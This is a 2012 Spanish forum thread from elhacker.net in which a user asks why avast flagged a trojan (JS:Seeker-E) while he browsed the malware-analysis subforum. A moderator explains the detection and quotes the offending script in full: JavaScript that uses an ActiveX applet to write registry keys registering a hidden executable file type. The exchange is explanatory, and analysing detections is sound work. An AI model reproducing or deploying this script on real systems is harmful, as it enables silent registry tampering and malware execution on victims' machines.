elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  avast! infection detected en subforo analisis y diseño de malware		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: avast! infection detected en subforo analisis y diseño de malware  (Leído 3,463 veces)
xiruko


Desconectado Desconectado

Mensajes: 438


Ver Perfil
avast! infection detected en subforo analisis y diseño de malware
« en: 21 Abril 2012, 22:54 pm »
buenas gente,

alguien sabe por que puede darme este aviso al entrar en algunos temas en el subforo de analisis y diseño de malware?

me ha dado 2 en apenas 20 segundos, y el aviso es de este estilo:

Citar
Infection detected!
avast! Web shield has detected a threat.
Infection: JS:Seeker-E [Trj]
URL: http://foro.elhacker.net/analisis_y_diseno_de_malware/tutorial_para_hacer_indetectable_cualquier_archivo-t359656.0.html;msg1738804;boardseen

decir que hace 2 o 3 semanas que lo tengo instalado y que vengo navegando por el foro y nunca me habia dado ninguna alarma.

agradeceria cualquier ayuda... gracias!
En línea
r32
Moderador
***
Desconectado Desconectado

Mensajes: 1.299



Ver Perfil WWW
Re: avast! infection detected en subforo analisis y diseño de malware
« Respuesta #1 en: 22 Abril 2012, 08:45 am »
Hola xiruko como puedes ver en la alerta es por un script del siguiente code:

Código:
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

</script>

Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar.
Aquí tienes el script analizado en Jotti:

Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4

2012-04-21 JS:Seeker-E

Saludos y gracias por el aviso !!!
« Última modificación: 22 Abril 2012, 11:16 am por r32 » En línea
xiruko


Desconectado Desconectado

Mensajes: 438


Ver Perfil
Re: avast! infection detected en subforo analisis y diseño de malware
« Respuesta #2 en: 22 Abril 2012, 14:10 pm »
vaya era por un code escrito en el post... me extraño ya que era la primera vez que me pasaba, y diria que no era la primera vez que veia un post con codes de este estilo.

bueno muchas gracias por la aclaracion!
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Reglas] Subforo de análisis y diseño de malware.
Análisis y Diseño de Malware 		Staff elhacker.net 0 24,202 Último mensaje 15 Junio 2008, 05:56 am
por Staff elhacker.net
analisis y diseno de malware « 1 2 »
Sugerencias y dudas sobre el Foro 		YST 17 10,532 Último mensaje 21 Junio 2009, 23:51 pm
por Littlehorse
Sección Analisis y Diseño de Malware
Sugerencias y dudas sobre el Foro 		fary 1 7,082 Último mensaje 15 Diciembre 2011, 23:53 pm
por skapunky
Problema de diseño malware peertopeer
Análisis y Diseño de Malware 		zerocoolcom 0 2,808 Último mensaje 10 Febrero 2013, 05:20 am
por zerocoolcom
Reglas de la sección Analisis y Diseño de Malware
Sugerencias y dudas sobre el Foro 		x64core 1 3,994 Último mensaje 30 Junio 2015, 10:23 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines